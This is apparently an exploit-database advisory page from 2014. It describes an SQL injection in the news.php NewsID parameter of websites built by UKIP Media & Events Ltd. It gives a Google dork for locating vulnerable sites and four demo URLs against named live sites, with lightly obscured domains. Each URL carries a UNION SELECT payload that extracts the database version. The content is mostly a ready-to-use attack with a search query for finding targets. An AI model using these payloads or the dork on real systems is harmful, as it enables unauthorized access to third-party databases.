UKIP Media SQL Injection

2014.01.05
Credit: Wild Wolves Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:\"2014 UKIP Media & Events Ltd\" inurl:\"NewsID=\"

############################################################################ # Exploit Title: UKIP Media SQL Injection # Date: 05/01/2014 # Exploit Author: Wild Wolves Team # Vendor Homepage: http://www.ukipme.com/ # Tested on: Win XP,Linux ############################################################################ # Google Dork: intext:"� 2014 UKIP Media & Events Ltd" inurl:"NewsID=" ############################################################################ # DemO: http://www.vehicledynamicsiXternational.com/news.php?NewsID=-38720+union+select+1,2,3,version(),5,6,7,8,9,10-- # DemO: http://www.aircraftinteriorsinXernational.com/news.php?NewsID=-50726+union+select+1,2,3,version(),5,6,7,8,9,10-- # DemO: http://www.enginetechnologXyinternational.com/news.php?NewsID=-53912+union+select+1,2,3,version(),5,6,7,8,9,10-- # DemO: http://www.postaltechnoloXgyinternational.com/news.php?NewsID=-53198+union+select+1,2,3,version(),5,6,7,8,9,10-- ################################### # Special Tnx: Wild Wolf And All Hidden Name! ################################### # The Last One : My Self, R3veC0der ###################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top